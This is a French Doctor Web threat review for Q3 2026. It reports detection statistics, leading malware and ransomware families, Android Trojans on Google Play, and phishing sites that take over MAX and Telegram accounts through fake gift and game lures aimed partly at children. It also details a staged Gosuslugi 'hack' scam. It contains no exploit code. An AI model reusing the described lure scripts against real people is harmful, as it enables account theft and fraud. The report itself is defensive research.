&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;D'après les statistiques de détection antivirus de Dr.Web, les utilisateurs ont été confrontés à des menaces 14,86 % moins fréquemment au troisième trimestre 2026 qu'au deuxième trimestre. Le nombre de fichiers uniques utilisés lors des attaques a diminué de 49,26 %. De plus, par rapport à la période de surveillance précédente, le nombre de menaces uniques identifiées a diminué de 63,39 %. Les menaces les plus fréquemment détectées sur les appareils protégés comprenaient les logiciels publicitaires et les chevaux de Troie publicitaires, les applications malveillantes qui dérobent les mots de passe et autres informations confidentielles, ainsi que les programmes d'installation et de téléchargement qui installent diverses menaces sur le système cible. De plus, les chevaux de Troie utilisés pour lancer automatiquement d'autres applications malveillantes sont restés actifs.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Le nombre de demandes de déchiffrement reçues par le support technique de Doctor Web a augmenté de 5,85 % par rapport au deuxième trimestre. Les requêtes ont été principalement liées aux encodeurs &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; et &lt;b&gt;Trojan.Encoder.44474&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Les scripts malveillants étaient le plus souvent détectés dans le trafic de messagerie ; il s’agissait principalement de programmes de téléchargement et d’installation qui déployaient d’autres menaces sur le système cible. De plus, des documents de phishing, des exploits et divers chevaux de Troie étaient diffusés par e-mail. Parmi ces derniers, les droppers et les downloaders étaient, comme pour les scripts malveillants, les plus actifs.&lt;/p&gt;

&lt;p&gt;Au troisième trimestre, les analyses du trafic Internet de Doctor Web ont rélévé un intérêt croissant des escrocs pour les utilisateurs de la messagerie russe MAX. Nos spécialistes ont identifié de nombreux nouveaux sites de phishing conçus pour dérober les comptes des utilisateurs de cette plateforme. Parallèlement, les pirates informatiques continuent de s'intéresser aux comptes d'autres applications de messagerie, notamment Telegram. Les utilisateurs ont également rencontré d'autres sites de phishing, notamment de faux sites bancaires.&lt;/p&gt;

&lt;p&gt;En juillet, le laboratoire antivirus Doctor Web a mis en garde contre un &lt;a href="https://news.drweb.fr/show/?i=15276" target="_blank"&gt;cheval de Troie ciblant les développeurs&lt;/a&gt; de logiciels. Il infecte les projets écrits en C++ et C#, contaminant ainsi les applications compilées, qui contribuent à leur tour à la propagation de la menace. De plus, si les projets infectés sont rendus publics, les autres développeurs qui les téléchargent et les utilisent compromettent également leurs systèmes et tous les programmes qu'ils créent. Ce cheval de Troie cumule plusieurs fonctions malveillantes : il agit comme un voleur de données, un mineur de cryptomonnaie, une porte dérobée et un outil de capture d'informations capable de dérober les données du presse-papiers.&lt;/p&gt;

&lt;p&gt;Au cours des trois derniers mois, les utilisateurs d'Android ont le plus souvent été confrontés au logiciel malveillant &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, qui permet aux attaquants de rediriger le trafic via les appareils infectés. De plus, une augmentation de l'activité du cheval de Troie bancaire &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; a été constatée. Les applications Android modifiées à l'aide d'outils de piratage figurent parmi les plus fréquemment détectées. Les créateurs de virus utilisent ces outils pour empêcher la détection et l'analyse des applications malveillantes.&lt;/p&gt;

&lt;p&gt;Au cours du troisième trimestre, les analystes antivirus de Doctor Web ont découvert des dizaines de chevaux de Troie dans le catalogue Google Play. Parmi eux figuraient de nombreux chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, qui abonnent leurs victimes à des services payants. Dans le même temps, nos experts ont découvert que certaines modifications récentes de ce logiciel malveillant ont ajouté une fonctionnalité permettant de convertir les appareils infectés en nœuds de sortie de botnet proxy.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendances principales du 3e trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Les utilisateurs ont été confrontés à des menaces diverses moins fréquemment.&lt;/li&gt;
        &lt;li&gt;Le nombre de fichiers uniques impliqués dans les attaques a diminué.&lt;/li&gt;
        &lt;li&gt;Les menaces détectées portaient moins de noms uniques.&lt;/li&gt;
        &lt;li&gt;Le nombre de demandes de déchiffrement de fichiers affectés par des rançongiciels a augmenté par rapport au deuxième trimestre.&lt;/li&gt;
        &lt;li&gt;Des escrocs en ligne continuent de cibler activement les utilisateurs de la messagerie instantanée russe MAX afin de tenter d'accéder à leurs comptes.&lt;/li&gt;
        &lt;li&gt;Les analystes antivirus de Doctor Web ont découvert un cheval de Troie dangereux et multifonctionnel qui cible les développeurs de logiciels et infecte les projets écrits en C++ et C# pour se propager.&lt;/li&gt;
        &lt;li&gt;Les menaces Android les plus répandues sont les chevaux de Troie de la famille &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, qui permettent aux attaquants de rediriger le trafic réseau via les appareils infectés.&lt;/li&gt;
        &lt;li&gt;De nouvelles applications malveillantes ont été découvertes dans le catalogue Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Données du service de statistiques de Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/01_stat_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/01_stat_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les menaces les plus répandues au cours du 3e trimestre 2026 :&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware souvent utilisé comme outil intermédiaire de téléchargement de programmes pirates.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;ТCheval de Troie écrit dans le langage de programmation Go et conçu pour charger divers miners et logiciels publicitaires dans le système cible. Le malware est un fichier DLL situé dans &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Pour son lancement, il exploite une vulnérabilité de la classe DLL Search Order Hijacking dans le client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PWS.Salat.390&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie qui vole les mots de passe de divers services, ainsi que d'autres informations confidentielles.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Client Torrent qui installe des logiciels indésirables sur l'appareil.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Proxy.32&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programme qui transforme un ordinateur cible en nœud de sortie de réseau proxy et permet la redirection du trafic tiers via cet appareil.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiques relatives aux programmes malveillants détectés dans le trafic e-mail&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/02_mail_traffic_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/02_mail_traffic_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les menaces les plus courantes dans le trafic de messagerie au 3e trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;X97M.DownLoader.2343&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un fichier XLSX (format de feuille de calcul Microsoft Excel) contenant un objet OLE qui télécharge un fichier malveillant sur l'ordinateur cible.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famille de Trojans Downloaders qui exploitent les vulnérabilités des documents créés dans MS Office. Ils sont conçus pour télécharger d'autres logiciels malveillants sur l'ordinateur attaqué.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.9376&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script JavaScript malveillant qui télécharge d'autres logiciels malveillants sur le système cible.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.Starter.541&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malveillant au format Visual Basic Script. Conçu pour exécuter diverses applications malveillantes sur les ordinateurs cibles.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Muldrop.1417&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malveillant au format JavaScript qui lance un malware caché sur le système cible.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Rançongiciels&lt;/h3&gt;

&lt;p&gt;Par rapport au deuxième trimestre, le nombre de demandes de déchiffrement de fichiers affectés par des chevaux de Troie de type rançongiciels a augmenté de 5,82 %.&lt;/p&gt;

&lt;p&gt;Dynamique des demandes de décryptage reçues par le support technique de Doctor Web :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/03_encoder_requests_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/03_encoder_requests_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les demandes des utilisateurs ont été le plus souvent liées à l'activité des encodeurs suivants :&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 13,98% des demandes ;&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 3,76% des demandes ;&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.44474&lt;/b&gt; — 3,23% des demandes ;&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356&lt;/b&gt; — 2,69% des demandes ;&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383&lt;/b&gt; — 2,15% des demandes ;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Fraude sur le Web&lt;/h3&gt;

&lt;p&gt;Au troisième trimestre 2026, l'intérêt des fraudeurs pour les utilisateurs de la messagerie russe MAX a continué de croître, une tendance que les analystes Internet de Doctor Web avaient déjà constatée au trimestre précédent. Au cours des trois derniers mois, nos spécialistes ont identifié un grand nombre de sites web malveillants présentant un style graphique similaire, créés par des pirates informatiques pour voler des comptes de la messagerie instantanée. Sur ces sites, les victimes potentielles pouvaient apparemment accéder à divers services. Pour ce faire, on leur demandait, sous divers prétextes, leur numéro de téléphone portable et le code de vérification qui leur avait été envoyé. Dans certains cas, on leur indiquait explicitement que pour recevoir ce qu'ils souhaitaient, ils devaient se connecter à leur compte MAX. D'autres sites ne mentionnaient aucune autorisation, et le numéro de téléphone et le code de confirmation étaient censés servir uniquement à vérifier que les visiteurs n'étaient pas des robots. Cependant, quelle que soit la raison invoquée, si les utilisateurs tombaient dans le piège et fournissaient les informations nécessaires, le résultat était le même : les escrocs accédaient à leurs comptes. De plus, ces sites web contenaient souvent des fautes d'orthographe, de grammaire et de ponctuation.&lt;/p&gt;

&lt;p&gt;L'une des couvertures utilisées par les attaquants a été la reprise de la plateforme de jeux Roblox en Russie au début de l'été. La plateforme est particulièrement populaire auprès des enfants et des adolescents, un public traditionnellement plus vulnérable aux cybermenaces, ce qui en fait une cible de choix pour les cybercriminels.&lt;/p&gt;

&lt;p&gt;Dans l’un des scénarios, les victimes potentielles se voyaient offrir des Robux gratuits, la monnaie virtuelle du jeu, en cadeau « pour fêter le déblocage de Roblox ». Selon le site web, les escrocs promettaient entre 1 000 et 30 000 pièces :&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/04_fake_max1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/04_fake_max1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/05_fake_max2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/05_fake_max2.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Pour les « recevoir », les utilisateurs devaient cliquer sur le bouton correspondant (par exemple, « Récupérer » ou « Recevoir »), fournir un numéro de téléphone pour « confirmation », puis saisir un code de vérification reçu par SMS ou directement dans l’application MAX Messenger. &lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/06_fake_max3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/06_fake_max3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;D'autres options proposaient aux visiteurs divers scripts et astuces pour Roblox, des objets rares en jeu et des « tapalki » (du mot anglais «  &lt;em&gt;tap&lt;/em&gt;  ») — des jeux et applications de type « clicker » simples où le fait de tapoter sur l'écran permet d'accumuler des ressources virtuelles (points, bonus, pièces), qui peuvent ensuite être transférées d'un jeu à un autre.&lt;br /&gt;Pour y « accéder », les victimes potentielles devaient également appuyer sur le bouton correspondant (« Télécharger », « Confirmer », etc.) et fournir un numéro de téléphone pour « confirmation »: &lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/07_fake_max4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/07_fake_max4.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/08_fake_max5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/08_fake_max5.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les cybercriminels ont exploité l'image d'un autre jeu populaire auprès des jeunes : Brawl Stars. Comme pour Roblox, les sites frauduleux proposaient aux victimes potentielles des objets et des bonus gratuits en jeu. Les utilisateurs de MAX pouvaient prétenduement les obtenir en scannant un code QR dédié :&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/09_fake_max6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/09_fake_max6.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/10_fake_max7.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/10_fake_max7.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Pour « recevoir » le code QR correspondant, ils devaient « passer une vérification via MAX » en fournissant leur numéro de téléphone portable et un code reçu par SMS ou messagerie :&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/11_fake_max8.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/11_fake_max8.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/12_fake_max9.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/12_fake_max9.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;De plus, sur certains de ces sites de phishing, les escrocs promettaient divers cadeaux, prétendument offerts par le jeu lui-même ou ses développeurs — par exemple, des caisses gratuites contenant des récompenses.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/13_fake_max10.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/13_fake_max10.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/14_fake_max11.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/14_fake_max11.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Les escrocs promettent des cadeaux de Brawl Stars et de SUPERCELL, tels que des boîtes gratuites contenant des objets du jeu (par exemple, des boîtes du personnage Bolt). Il est demandé aux utilisateurs de cliquer sur un bouton de confirmation et de saisir leur numéro de téléphone portable ainsi qu'un code de vérification.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Outre les bonus et cadeaux proposés pour les jeux populaires, les cybercriminels tentaient également d'appâter leurs victimes potentielles avec d'autres offres. Parmi celles-ci figurent des services de promotion sur les réseaux sociaux, par exemple sur Likee. Les escrocs promettaient « d'augmenter » le nombre d'abonnés, de likes et de commentaires, mais pour en bénéficier, les utilisateurs devaient se connecter à l'aide de MAX Messenger :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/15_fake_max12.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/15_fake_max12.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un site de phishing promet une promotion sur le réseau Likee, mais cela nécessite une autorisation via le MAX Messenger.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Plusieurs de ces sites proposaient aux visiteurs d'installer des mods spécialisés (versions modifiées) de MAX, qui, prétendument, permettaient aux utilisateurs d'épingler des morceaux de musique sur leur profil de messagerie. Pour « obtenir » un tel mod, les utilisateurs devaient se connecter à l’aide de leur numéro de téléphone portable et accéder à leur compte personnel. Il est à noter que la possibilité d'ajouter de la musique à un profil n'est actuellement pas disponible dans la version officielle de MAX, mais qu'elle est proposée par plusieurs services concurrents. Les escrocs comptent ainsi sur la passivité de leurs victimes potentielles, attirées par des fonctionnalités séduisantes.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/16_fake_max13.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/16_fake_max13.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site frauduleux propose la possibilité d'« ajouter des titres à votre profil MAX ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Un autre scénario frauduleux proposait aux utilisateurs d'accéder à un carnet de notes d'école en ligne pour consulter leurs notes :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/18_fake_max15.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/18_fake_max15.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;D'autres sites web auraient permis d'accéder à la version web de la messagerie MAX et demandaient aux utilisateurs de se connecter avec un numéro de téléphone pour « accéder à leur profil ».&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/19_fake_max16.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/19_fake_max16.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/20_fake_max17.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/20_fake_max17.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Certaines de ces ressources en ligne frauduleuses promettaient d'aider à identifier le nom du contact de la victime potentielle. Pour ce faire, les visiteurs étaient invités à « confirmer leur identité » en se connectant à MAX.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/21_fake_max18.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/21_fake_max18.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Plusieurs sites web promettaient un accès gratuit à des contenus restreints provenant de blogueurs et de créateurs de contenu pour adultes, notamment la consultation d'archives multimédias ayant fait l'objet de fuites et la possibilité d'obtenir un abonnement d'essai pour des services spécialisés. La demande d'autorisation via la messagerie MAX, avec un code de confirmation, formulée par les escrocs, s'expliquait notamment par la nécessité de « se protéger contre les bots et les blocages ». &lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/22_fake_max19.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/22_fake_max19.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/23_fake_max20.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/23_fake_max20.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Parallèlement, cette campagne ciblait non seulement les utilisateurs de MAX, mais aussi ceux d'autres messageries, dont Telegram. Certains des sites web identifiés imitaient des conversations avec le compte officiel de la messagerie et, prétendument au nom de la plateforme, offraient un cadeau aux victimes potentielles : un abonnement Telegram Premium. &lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/24_fake_telegram1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/24_fake_telegram1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/25_fake_telegram2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/25_fake_telegram2.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Pour « recevoir » ce cadeau, les utilisateurs devaient se connecter à leur compte à l’aide de leur numéro de téléphone portable et du code de vérification unique qui leur avait été envoyé.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/26_fake_telegram3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/26_fake_telegram3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Dans un scénario similaire, les attaquants promettaient aux victimes potentielles de recevoir gratuitement des cadeaux virtuels issus de l’écosystème Telegram, notamment diverses collections telles que Toy Bear, Snoop Dogg, etc. Pour ce faire, les pirates demandaient aux utilisateurs de « passer une vérification » (par exemple, pour prouver qu'ils n'étaient pas des robots et de s’assurer qu’un même visiteur ne puisse recevoir le cadeau qu'une seule fois). Pour effectuer cette vérification, les utilisateurs devaient fournir leur numéro de téléphone portable et un code de confirmation. Il est possible que ces sites web frauduleux, tout comme ceux sur le thème des jeux vidéo, aient principalement ciblé les enfants et les adolescents :&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/27_fake_telegram4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/27_fake_telegram4.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/28_fake_telegram5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/28_fake_telegram5.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les cybercriminels ont également tenté d'appâter des victimes potentielles en leur offrant la possibilité de recevoir des étoiles Telegram (la monnaie numérique interne du messager) en échange d'un « abonnement » à certaines chaînes du messager. Dans ce cas, les utilisateurs devaient à nouveau se connecter à leur compte Telegram et fournir un code de vérification :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/29_fake_telegram6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/29_fake_telegram6.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Au troisième trimestre 2026, les experts de Doctor Web ont constaté la poursuite du développement de stratagèmes frauduleux visant à voler des données personnelles et des comptes sur divers services. Une tactique courante des escrocs consiste à informer leurs victimes qu'un compte est soi-disant compromis. Généralement, les pirates confrontent immédiatement leurs victimes potentielles au fait que leurs données ont « fuité » et les incitent à prendre des mesures immédiates pour protéger leurs informations confidentielles (par exemple, cliquer sur un lien, appeler le « support », etc.). Cependant, dans plusieurs cas identifiés par nos analystes sur des sites d'hameçonnage, l'intimidation liée à un piratage « accidentel » était délibérément orchestrée de manière progressive. L'utilisateur était progressivement mis sous pression, jusqu'à ce qu'il baisse sa garde et effectue les actions souhaitées par les attaquants. Parmi les sites web utilisant des arnaques similaires figurait, par exemple, une nouvelle imitation de sites de fournisseurs d'énergie.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/30_scam_energ1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/30_scam_energ1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un site de phishing, se faisant passer pour le site officiel d'une entreprise russe de réseau électrique, incitait les utilisateurs à se connecter à leur compte. &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Après qu'une victime potentielle, pensant se trouver sur un site web légitime, a saisi ses identifiants de connexion, le site frauduleux simule une authentification via Gosuslugi et une « synchronisation » avec les bases de données de divers organismes gouvernementaux :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/31_scam_energ2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/31_scam_energ2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site web donne l'illusion d'une authentification via Gosuslugi et d'une synchronisation avec des « bases de données ministérielles ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Le site web annonce ensuite que le compte Gosuslugi de l'utilisateur a été piraté. Pour étayer son affirmation, il cite un appareil précis depuis lequel le compte Gosuslugi aurait été consulté, et indique la localisation géographique de la connexion non autorisée. Le site avertit également que si ces actions n'ont pas été effectuées par l'utilisateur lui-même, son compte sera bloqué. Pour "désynchroniser l'appareil d'une autre personne" et empêcher la fuite des informations personnelles de la victime potentielle, la victime est demandée de contacter immédiatement l'opérateur :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/32_scam_energ3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/32_scam_energ3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Pour « dissocier » l'appareil d'une autre personne de son compte Gosuslugi et, soi-disant, protéger ses données personnelles, notamment les informations de passeport, le numéro SNILS et le numéro d'identification fiscale, l'utilisateur est invité à contacter un « opérateur ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Après que l'utilisateur a cliqué sur le bouton « demander un appel », le site gagne du temps en affichant un compte à rebours d'une ou plusieurs minutes et un message indiquant que la demande est en cours de traitement :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/33_scam_energ4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/33_scam_energ4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site informe que la demande est en cours de traitement et que « l'opérateur de garde » contactera l'utilisateur dans le délai indiqué.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Une fois le délai écoulé, rien ne se passe pour clarifier la situation. Au lieu de cela, des boutons apparaissent sur le site frauduleux pour soumettre à nouveau la « demande » et pour contacter soi-même « l’opérateur de garde ».&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/34_scam_energ5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/34_scam_energ5.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
